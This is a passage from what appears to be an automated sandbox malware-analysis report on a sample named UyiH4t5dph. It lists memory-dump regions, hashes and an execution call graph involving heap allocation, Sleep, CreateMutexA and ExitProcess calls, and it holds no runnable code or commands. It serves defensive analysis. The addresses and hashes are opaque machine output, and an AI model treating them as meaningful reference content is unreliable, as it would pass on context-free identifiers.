                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                          • String ID:
                                                          • API String ID: 57040152-0
                                                          • Opcode ID: c1baf4d08805f1df1405163cb9d5304a3eb9a24114c05e984e62829778eccc83
                                                          • Instruction ID: ff5f00b53d3050c26f8af4840b67037448065602f4697a8d3e2006751e7038ec
                                                          • Opcode Fuzzy Hash: c1baf4d08805f1df1405163cb9d5304a3eb9a24114c05e984e62829778eccc83
                                                          • Instruction Fuzzy Hash: 99A1D070A212469FDB21DFA5C84479AB7B8FF15310F54812AE815D7341EB31EE25CBD2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                          • String ID:
                                                          • API String ID: 531285432-0
                                                          • Opcode ID: 12a99632fa077c55ea74a9b709fa5bbc5bbe55cc2218d297d0fba758f9c676d0
                                                          • Instruction ID: 8be47bbb13876587a29d1e72227e2ed41844b3348b18d4c3976049812be0dc5e
                                                          • Opcode Fuzzy Hash: 12a99632fa077c55ea74a9b709fa5bbc5bbe55cc2218d297d0fba758f9c676d0
                                                          • Instruction Fuzzy Hash: 40213D71A50249AFDF01EFA5D8829BFB7B9EF48710F60041AF905A7261DB309D129FA0

                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1779
                                                          Total number of Limit Nodes:15
                                                          execution_graph 9797 be9ab8 9799 be9acc 9797->9799 9800 be9b08 9799->9800 9801 be9b4b shared_ptr 9800->9801 9805 bea917 9800->9805 9802 be9b59 9801->9802 9803 be9b65 9801->9803 9806 bf80c0 RtlAllocateHeap 9802->9806 9826 bf7a00 9803->9826 9807 bea953 Sleep CreateMutexA 9805->9807 9808 c16c6a RtlAllocateHeap 9805->9808 9810 bea903 9806->9810 9812 bea98e 9807->9812 9808->9807 9809 be9b74 9840 be5c10 9809->9840 9813 be9b7c 9891 be8b30 9813->9891 9815 be9b8d 9928 bf8220 9815->9928 9817 be9b9c 9818 bf7a00 RtlAllocateHeap 9817->9818 9819 be9ca9 9818->9819 9820 be5c10 4 API calls 9819->9820 9821 be9cb1 9820->9821 9822 be8b30 4 API calls 9821->9822 9823 be9cc2 9822->9823 9824 bf8220 RtlAllocateHeap 9823->9824 9825 be9cd1 9824->9825 9827 bf7a26 9826->9827 9828 bf7a2d 9827->9828 9829 bf7a62 9827->9829 9830 bf7a81 9827->9830 9828->9809 9831 bf7ab9 9829->9831 9832 bf7a69 9829->9832 9834 bfd3e2 RtlAllocateHeap 9830->9834 9838 bf7a76 __cftof 9830->9838 9835 be2480 RtlAllocateHeap 9831->9835 9833 bfd3e2 RtlAllocateHeap 9832->9833 9836 bf7a6f 9833->9836 9834->9838 9835->9836 9837 c16c6a RtlAllocateHeap 9836->9837 9836->9838 9839 bf7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9837->9839 9838->9809 9839->9809 9936 be5940 9840->9936 9842 be5c54 9939 be4b30 9842->9939 9844 be5d17 shared_ptr std::invalid_argument::invalid_argument 9844->9813 9845 be5c7b shared_ptr 9845->9844 9846 c16c6a RtlAllocateHeap 9845->9846 9847 be5d47 __cftof 9846->9847 9847->9847 9848 bf80c0 RtlAllocateHeap 9847->9848 9850 be5e3e 9848->9850 9849 be5ea6 shared_ptr std::invalid_argument::invalid_argument 9849->9813 9850->9849 9851 c16c6a RtlAllocateHeap 9850->9851 9852 be5ed2 9851->9852 9853 be5ffe shared_ptr std::invalid_argument::invalid_argument 9852->9853 9854 c16c6a RtlAllocateHeap 9852->9854 9853->9813 9855 be601b 9854->9855 9856 bf80c0 RtlAllocateHeap 9855->9856 9857 be6089 9856->9857 9858 bf80c0 RtlAllocateHeap 9857->9858 9859 be60bd 9858->9859 9860 bf80c0 RtlAllocateHeap 9859->9860 9861 be60ee 9860->9861 9862 bf80c0 RtlAllocateHeap 9861->9862 9863 be611f 9862->9863 9864 bf80c0 RtlAllocateHeap 9863->9864 9866 be6150 9864->9866 9865 be65b1 shared_ptr std::invalid_argument::invalid_argument 9865->9813 9866->9865 9867 c16c6a RtlAllocateHeap 9866->9867 9868 be65dc 9867->9868 9869 bf7a00 RtlAllocateHeap 9868->9869 9870 be66a6 9869->9870 9871 be5c10 4 API calls 9870->9871 9872 be66ac 9871->9872 9873 be5c10 4 API calls 9872->9873 9874 be66b1 9873->9874 9946 be22c0 9874->9946 9876 be66c9 shared_ptr 9877 bf7a00 RtlAllocateHeap 9876->9877 9878 be6732 9877->9878 9879 be5c10 4 API calls 9878->9879 9880 be673d 9879->9880 9881 be22c0 4 API calls 9880->9881 9890 be6757 shared_ptr 9881->9890 9882 be6852 9883 bf80c0 RtlAllocateHeap 9882->9883 9885 be689c 9883->9885 9884 bf7a00 RtlAllocateHeap 9884->9890 9886 bf80c0 RtlAllocateHeap 9885->9886 9888 be68e3 shared_ptr std::invalid_argument::invalid_argument 9886->9888 9887 be5c10 4 API calls 9887->9890 9888->9813 9889 be22c0 4 API calls 9889->9890 9890->9882 9890->9884 9890->9887 9890->9889 9892 be8b7c 9891->9892 9893 bf7a00 RtlAllocateHeap 9892->9893 9894 be8b8c 9893->9894 9895 be5c10 4 API calls 9894->9895 9896 be8b97 9895->9896 9897 bf80c0 RtlAllocateHeap 9896->9897 9898 be8be3 9897->9898 9899 bf80c0 RtlAllocateHeap 9898->9899 9900 be8c35 9899->9900 9901 bf8220 RtlAllocateHeap 9900->9901 9902 be8c47 shared_ptr 9901->9902 9903 be8d01 shared_ptr std::invalid_argument::invalid_argument 9902->9903 9904 c16c6a RtlAllocateHeap 9902->9904 9903->9815 9905 be8d2d 9904->9905 9906 bf7a00 RtlAllocateHeap 9905->9906 9907 be8d8f 9906->9907 9908 be5c10 4 API calls 9907->9908 9909 be8d9a 9908->9909 9910 bf80c0 RtlAllocateHeap 9909->9910 9911 be8dec 9910->9911 9912 bf8220 RtlAllocateHeap 9911->9912 9914 be8dfe shared_ptr 9912->9914 9913 be8e7e shared_ptr std::invalid_argument::invalid_argument 9913->9815 9914->9913 9915 c16c6a RtlAllocateHeap 9914->9915 9916 be8eaa 9915->9916 9917 bf7a00 RtlAllocateHeap 9916->9917 9918 be8f0f 9917->9918 9919 be5c10 4 API calls 9918->9919 9920 be8f1a 9919->9920 9921 bf80c0 RtlAllocateHeap 9920->9921 9922 be8f6c 9921->9922 9923 bf8220 RtlAllocateHeap 9922->9923 9925 be8f7e shared_ptr 9923->9925 9924 be8ffe shared_ptr std::invalid_argument::invalid_argument 9924->9815 9925->9924 9926 c16c6a RtlAllocateHeap 9925->9926 9927 be902a 9926->9927 9929 bf8248 9928->9929 9930 bf8292 9928->9930 9929->9930 9931 bf8251 9929->9931 9933 bf82a1 9930->9933 10353 bf8f40 9930->10353 10348 bf9280 9931->10348 9933->9817 9935 bf825a 9935->9817 9949 bf7f80 9936->9949 9938 be596b 9938->9842 9940 be4dc2 9939->9940 9944 be4b92 9939->9944 9940->9845 9941 be4ce5 9941->9940 9943 bf8ca0 RtlAllocateHeap 9941->9943 9943->9941 9944->9941 9964 c16da6 9944->9964 9969 bf8ca0 9944->9969 10145 be2280 9946->10145 9952 bf7fc7 9949->9952 9954 bf7f9e __cftof 9949->9954 9950 bf80b3 9951 bf9270 RtlAllocateHeap 9950->9951 9953 bf80b8 9951->9953 9952->9950 9955 bf803e 9952->9955 9956 bf801b 9952->9956 9957 be2480 RtlAllocateHeap 9953->9957 9954->9938 9960 bfd3e2 RtlAllocateHeap 9955->9960 9961 bf802c __cftof 9955->9961 9956->9953 9959 bfd3e2 RtlAllocateHeap 9956->9959 9958 bf80bd 9957->9958 9959->9961 9960->9961 9962 bf8095 shared_ptr 9961->9962 9963 c16c6a RtlAllocateHeap 9961->9963 9962->9938 9963->9950 9965 c16dc2 9964->9965 9966 c16db4 9964->9966 9965->9944 9984 c16d19 9966->9984 9970 bf8dc9 9969->9970 9971 bf8cc3 9969->9971 9972 bf9270 RtlAllocateHeap 9970->9972 9974 bf8d2f 9971->9974 9975 bf8d05 9971->9975 9973 bf8dce 9972->9973 9976 be2480 RtlAllocateHeap 9973->9976 9979 bfd3e2 RtlAllocateHeap 9974->9979 9982 bf8d16 __cftof 9974->9982 9975->9973 9977 bf8d10 9975->9977 9976->9982 9978 bfd3e2 RtlAllocateHeap 9977->9978 9978->9982 9979->9982 9980 c16c6a RtlAllocateHeap 9981 bf8dd8 9980->9981 9982->9980 9983 bf8d8b shared_ptr __cftof 9982->9983 9983->9944 9989 c1690a 9984->9989 9988 c16d3d 9988->9944 9990 c1692a 9989->9990 9996 c16921 9989->9996 9990->9996 10003 c1a671 9990->10003 9997 c16d52 9996->9997 9998 c16d8f 9997->9998 10001 c16d5f 9997->10001 10125 c1b67d 9998->10125 9999 c16d6e 9999->9988 10001->9999 10120 c1b6a1 10001->10120 10004 c1a67b __dosmaperr 10003->10004 10005 c1d82f __dosmaperr RtlAllocateHeap 10004->10005 10006 c1a694 10004->10006 10008 c1a6bc __dosmaperr 10005->10008 10007 c1694a 10006->10007 10025 c18bec 10006->10025 10017 c1b5fb 10007->10017 10009 c1a6fc 10008->10009 10010 c1a6c4 __dosmaperr 10008->10010 10012 c1a49f __dosmaperr RtlAllocateHeap 10009->10012 10013 c1adf5 __freea RtlAllocateHeap 10010->10013 10015 c1a707 10012->10015 10013->10006 10016 c1adf5 __freea RtlAllocateHeap 10015->10016 10016->10006 10018 c16960 10017->10018 10019 c1b60e 10017->10019 10021 c1b628 10018->10021 10019->10018 10058 c1f5ab 10019->10058 10022 c1b650 10021->10022 10023 c1b63b 10021->10023 10022->9996 10023->10022 10071 c1e6b1 10023->10071 10026 c18bf1 __cftof 10025->10026 10030 c18bfc __cftof 10026->10030 10031 c1d634 10026->10031 10052 c165ed 10030->10052 10032 c1d640 __dosmaperr 10031->10032 10033 c1a7c8 __dosmaperr RtlAllocateHeap 10032->10033 10038 c1d667 __cftof 10032->10038 10040 c1d66d __cftof __dosmaperr 10032->10040 10033->10038 10034 c1d6b2 10036 c175f6 __dosmaperr RtlAllocateHeap 10034->10036 10035 c1d69c 10035->10030 10037 c1d6b7 10036->10037 10039 c16c5a ___std_exception_copy RtlAllocateHeap 10037->10039 10038->10034 10038->10035 10038->10040 10039->10035 10042 c1d726 10040->10042 10043 c1d81b __cftof 10040->10043 10049 c1d751 __cftof 10040->10049 10041 c165ed __cftof 3 API calls 10044 c1d82e 10041->10044 10042->10049 10055 c1d62b 10042->10055 10043->10041 10046 c1a671 __cftof 4 API calls 10050 c1d7a5 10046->10050 10048 c1d62b __cftof 4 API calls 10048->10049 10049->10035 10049->10046 10049->10050 10050->10035 10051 c1a671 __cftof 4 API calls 10050->10051 10051->10035 10053 c164c7 __cftof 3 API calls 10052->10053 10054 c165fe 10053->10054 10056 c1a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10055->10056 10057 c1d630 10056->10057 10057->10048 10059 c1f5b7 __dosmaperr 10058->10059 10060 c1a671 __cftof 4 API calls 10059->10060 10062 c1f5c0 __dosmaperr 10060->10062 10061 c1f606 10061->10018 10062->10061 10067 c1f62c 10062->10067 10064 c1f5ef __cftof 10064->10061 10065 c18bec __cftof 4 API calls 10064->10065 10066 c1f62b 10065->10066 10068 c1f63a __dosmaperr 10067->10068 10070 c1f647 10067->10070 10069 c1f35f __dosmaperr RtlAllocateHeap 10068->10069 10068->10070 10069->10070 10070->10064 10072 c1a671 __cftof 4 API calls 10071->10072 10073 c1e6bb 10072->10073 10076 c1e5c9 10073->10076 10075 c1e6c1 10075->10022 10080 c1e5d5 __dosmaperr 10076->10080 10077 c1e5f6 10077->10075 10078 c1e5ef __cftof 10078->10077 10079 c18bec __cftof 4 API calls 10078->10079 10081 c1e668 10079->10081 10080->10078 10084 c1adf5 __freea RtlAllocateHeap 10080->10084 10082 c1e6a4 10081->10082 10087 c1a72e 10081->10087 10082->10075 10084->10078 10088 c1a739 __dosmaperr 10087->10088 10089 c1d82f __dosmaperr RtlAllocateHeap 10088->10089 10100 c1a745 10088->10100 10093 c1a769 __dosmaperr 10089->10093 10090 c18bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10091 c1a7c7 10090->10091 10092 c1a7be 10101 c1e4b0 10092->10101 10094 c1a7a5 10093->10094 10095 c1a771 __dosmaperr 10093->10095 10096 c1a49f __dosmaperr RtlAllocateHeap 10094->10096 10097 c1adf5 __freea RtlAllocateHeap 10095->10097 10098 c1a7b0 10096->10098 10097->10100 10099 c1adf5 __freea RtlAllocateHeap 10098->10099 10099->10100 10100->10090 10100->10092 10102 c1e5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10101->10102 10103 c1e4c3 10102->10103 10104 c1e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10103->10104 10105 c1e4cb 10104->10105 10106 c1e4dc 10105->10106 10107 c1b04b __cftof RtlAllocateHeap 10105->10107 10106->10082 10108 c1e4ed 10107->10108 10109 c1e6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10108->10109 10119 c1e51f 10108->10119 10110 c1e512 10109->10110 10112 c1e51a 10110->10112 10115 c1e535 __cftof 10110->10115 10111 c1adf5 __freea RtlAllocateHeap 10113 c1e52d 10111->10113 10114 c175f6 __dosmaperr RtlAllocateHeap 10112->10114 10113->10082 10114->10119 10116 c1e561 10115->10116 10117 c1adf5 __freea RtlAllocateHeap 10115->10117 10118 c1e14b __cftof RtlAllocateHeap 10116->10118 10116->10119 10117->10116 10118->10119 10119->10111 10121 c1690a __cftof 4 API calls 10120->10121 10123 c1b6be 10121->10123 10122 c1b6ce std::invalid_argument::invalid_argument 10122->9999 10123->10122 10130 c1f1bf 10123->10130 10126 c1a671 __cftof 4 API calls 10125->10126 10127 c1b688 10126->10127 10128 c1b5fb __cftof 4 API calls 10127->10128 10129 c1b698 10128->10129 10129->9999 10131 c1690a __cftof 4 API calls 10130->10131 10132 c1f1df __cftof 10131->10132 10134 c1f29d std::invalid_argument::invalid_argument 10132->10134 10136 c1f232 __cftof 10132->10136 10137 c1b04b 10132->10137 10134->10122 10141 c1f2c2 10136->10141 10139 c1b059 __dosmaperr 10137->10139 10138 c175f6 __dosmaperr RtlAllocateHeap 10140 c1b087 10138->10140 10139->10138 10139->10140 10140->10136 10142 c1f2df 10141->10142 10143 c1f2ce 10141->10143 10142->10134 10143->10142 10144 c1adf5 __freea RtlAllocateHeap 10143->10144 10144->10142 10146 be2296 10145->10146 10149 c187f8 10146->10149 10152 c17609 10149->10152 10151 be22a4 10151->9876 10153 c17631 10152->10153 10154 c17649 10152->10154 10155 c175f6 __dosmaperr RtlAllocateHeap 10153->10155 10154->10153 10156 c17651 10154->10156 10157 c17636 10155->10157 10158 c1690a __cftof 4 API calls 10156->10158 10159 c16c5a ___std_exception_copy RtlAllocateHeap 10157->10159 10160 c17661 10158->10160 10161 c17641 std::invalid_argument::invalid_argument 10159->10161 10165 c17bc4 10160->10165 10161->10151 10181 c1868d 10165->10181 10167 c176e8 10178 c17a19 10167->10178 10168 c17be4 10169 c175f6 __dosmaperr RtlAllocateHeap 10168->10169 10170 c17be9 10169->10170 10171 c16c5a ___std_exception_copy RtlAllocateHeap 10170->10171 10171->10167 10172 c17bd5 10172->10167 10172->10168 10188 c17d15 10172->10188 10196 c18168 10172->10196 10201 c17dc2 10172->10201 10206 c17de8 10172->10206 10235 c17f36 10172->10235 10179 c1adf5 __freea RtlAllocateHeap 10178->10179 10180 c17a29 10179->10180 10180->10161 10182 c18692 10181->10182 10183 c186a5 10181->10183 10184 c175f6 __dosmaperr RtlAllocateHeap 10182->10184 10183->10172 10185 c18697 10184->10185 10186 c16c5a ___std_exception_copy RtlAllocateHeap 10185->10186 10187 c186a2 10186->10187 10187->10172 10257 c17d34 10188->10257 10190 c17d1a 10191 c17d31 10190->10191 10192 c175f6 __dosmaperr RtlAllocateHeap 10190->10192 10191->10172 10193 c17d23 10192->10193 10194 c16c5a ___std_exception_copy RtlAllocateHeap 10193->10194 10195 c17d2e 10194->10195 10195->10172 10197 c18171 10196->10197 10198 c18178 10196->10198 10266 c17b50 10197->10266 10198->10172 10202 c17dd2 10201->10202 10203 c17dcb 10201->10203 10202->10172 10204 c17b50 4 API calls 10203->10204 10205 c17dd1 10204->10205 10205->10172 10207 c17e09 10206->10207 10208 c17def 10206->10208 10209 c175f6 __dosmaperr RtlAllocateHeap 10207->10209 10212 c17e39 10207->10212 10210 c17fbb 10208->10210 10211 c17f4f 10208->10211 10208->10212 10213 c17e25 10209->10213 10214 c18001 10210->10214 10215 c17fc2 10210->10215 10222 c17f92 10210->10222 10211->10222 10225 c17f5b 10211->10225 10212->10172 10216 c16c5a ___std_exception_copy RtlAllocateHeap 10213->10216 10307 c18604 10214->10307 10218 c17fc7 10215->10218 10219 c17f69 10215->10219 10220 c17e30 10216->10220 10218->10222 10224 c17fcc 10218->10224 10232 c17f77 10219->10232 10234 c17f8b 10219->10234 10301 c18241 10219->10301 10220->10172 10222->10232 10222->10234 10292 c18420 10222->10292 10223 c17fa2 10223->10234 10278 c18390 10223->10278 10227 c17fd1 10224->10227 10228 c17fdf 10224->10228 10225->10219 10225->10223 10225->10232 10227->10234 10282 c185e5 10227->10282 10286 c18571 10228->10286 10232->10234 10310 c186ea 10232->10310 10234->10172 10236 c17fbb 10235->10236 10237 c17f4f 10235->10237 10238 c18001 10236->10238 10239 c17fc2 10236->10239 10245 c17f92 10236->10245 10237->10245 10248 c17f5b 10237->10248 10242 c18604 RtlAllocateHeap 10238->10242 10240 c17fc7 10239->10240 10241 c17f69 10239->10241 10244 c17fcc 10240->10244 10240->10245 10243 c18241 4 API calls 10241->10243 10247 c17f8b 10241->10247 10255 c17f77 10241->10255 10242->10255 10243->10255 10250 c17fd1 10244->10250 10251 c17fdf 10244->10251 10245->10247 10249 c18420 RtlAllocateHeap 10245->10249 10245->10255 10246 c17fa2 10246->10247 10253 c18390 4 API calls 10246->10253 10247->10172 10248->10241 10248->10246 10248->10255 10249->10255 10250->10247 10254 c185e5 RtlAllocateHeap 10250->10254 10252 c18571 RtlAllocateHeap 10251->10252 10252->10255 10253->10255 10254->10255 10255->10247 10256 c186ea 4 API calls 10255->10256 10256->10247 10260 c17d5e 10257->10260 10259 c17d40 10259->10190 10261 c17d80 10260->10261 10262 c175f6 __dosmaperr RtlAllocateHeap 10261->10262 10265 c17db7 10261->10265 10263 c17dac 10262->10263 10264 c16c5a ___std_exception_copy RtlAllocateHeap 10263->10264 10264->10265 10265->10259 10267 c17b62 10266->10267 10268 c17b67 10266->10268 10269 c175f6 __dosmaperr RtlAllocateHeap 10267->10269 10274 c18ab6 10268->10274 10269->10268 10272 c175f6 __dosmaperr RtlAllocateHeap 10273 c17b99 10272->10273 10273->10172 10275 c18ad1 10274->10275 10276 c18868 GetPEB ExitProcess GetPEB RtlAllocateHeap 10275->10276 10277 c17b85 10276->10277 10277->10272 10277->10273 10280 c183ab 10278->10280 10279 c183dd 10279->10232 10280->10279 10314 c1c88e 10280->10314 10283 c185f1 10282->10283 10284 c18420 RtlAllocateHeap 10283->10284 10285 c18603 10284->10285 10285->10232 10290 c18586 10286->10290 10287 c175f6 __dosmaperr RtlAllocateHeap 10288 c1858f 10287->10288 10289 c16c5a ___std_exception_copy RtlAllocateHeap 10288->10289 10291 c1859a 10289->10291 10290->10287 10290->10291 10291->10232 10293 c18433 10292->10293 10294 c1844e 10293->10294 10296 c18465 10293->10296 10295 c175f6 __dosmaperr RtlAllocateHeap 10294->10295 10297 c18453 10295->10297 10298 c1845e 10296->10298 10317 c1779f 10296->10317 10299 c16c5a ___std_exception_copy RtlAllocateHeap 10297->10299 10298->10232 10299->10298 10302 c1825a 10301->10302 10303 c1779f RtlAllocateHeap 10302->10303 10304 c18297 10303->10304 10327 c1d3c8 10304->10327 10306 c1830d 10306->10232 10308 c18420 RtlAllocateHeap 10307->10308 10309 c1861b 10308->10309 10309->10232 10311 c1875d std::invalid_argument::invalid_argument 10310->10311 10313 c18707 10310->10313 10311->10234 10312 c1c88e __cftof 4 API calls 10312->10313 10313->10311 10313->10312 10315 c1c733 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10314->10315 10316 c1c8a6 10315->10316 10316->10279 10318 c177b4 10317->10318 10320 c177c3 10317->10320 10319 c175f6 __dosmaperr RtlAllocateHeap 10318->10319 10321 c177b9 10319->10321 10320->10321 10322 c1b04b __cftof RtlAllocateHeap 10320->10322 10321->10298 10323 c177ea 10322->10323 10324 c17801 10323->10324 10325 c17a33 RtlAllocateHeap 10323->10325 10326 c1adf5 __freea RtlAllocateHeap 10324->10326 10325->10324 10326->10321 10328 c1d3d8 10327->10328 10329 c1d3ee 10327->10329 10330 c175f6 __dosmaperr RtlAllocateHeap 10328->10330 10329->10328 10333 c1d400 10329->10333 10331 c1d3dd 10330->10331 10332 c16c5a ___std_exception_copy RtlAllocateHeap 10331->10332 10334 c1d3e7 10332->10334 10335 c1d439 10333->10335 10337 c1d467 10333->10337 10334->10306 10344 c1d2ff RtlAllocateHeap 10335->10344 10336 c1d485 10340 c1d4e4 10336->10340 10341 c1d4ae 10336->10341 10337->10336 10338 c1d48a 10337->10338 10339 c1cbdf GetPEB ExitProcess GetPEB RtlAllocateHeap 10338->10339 10339->10334 10345 c1cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10340->10345 10342 c1d4b3 10341->10342 10343 c1d4cc 10341->10343 10346 c1d23e GetPEB ExitProcess GetPEB RtlAllocateHeap 10342->10346 10347 c1d0e2 GetPEB ExitProcess GetPEB RtlAllocateHeap 10343->10347 10344->10334 10345->10334 10346->10334 10347->10334 10349 bf9294 10348->10349 10352 bf92a5 __cftof 10349->10352 10374 bf94e0 10349->10374 10351 bf932b 10351->9935 10352->9935 10354 bf908e 10353->10354 10355 bf8f6b 10353->10355 10356 bf9270 RtlAllocateHeap 10354->10356 10359 bf8fb2 10355->10359 10361 bf8fdc 10355->10361 10357 bf9093 10356->10357 10358 be2480 RtlAllocateHeap 10357->10358 10369 bf8fc3 __cftof 10358->10369 10359->10357 10360 bf8fbd 10359->10360 10363 bfd3e2 RtlAllocateHeap 10360->10363 10364 bfd3e2 RtlAllocateHeap 10361->10364 10361->10369 10362 c16c6a RtlAllocateHeap 10365 bf909d 10362->10365 10363->10369 10364->10369 10366 bf90b8 10365->10366 10370 bf90be 10365->10370 10371 be2480 Concurrency::cancel_current_task 10365->10371 10367 bfd3e2 RtlAllocateHeap 10366->10367 10367->10370 10368 bf904c shared_ptr __cftof 10368->9933 10369->10362 10369->10368 10370->9933 10372 c138af ___std_exception_copy RtlAllocateHeap 10371->10372 10373 be24c3 10372->10373 10373->9933 10375 bf950b 10374->10375 10376 bf9619 10374->10376 10380 bf9579 10375->10380 10381 bf9552 10375->10381 10377 bf9270 RtlAllocateHeap 10376->10377 10378 bf961e 10377->10378 10379 be2480 RtlAllocateHeap 10378->10379 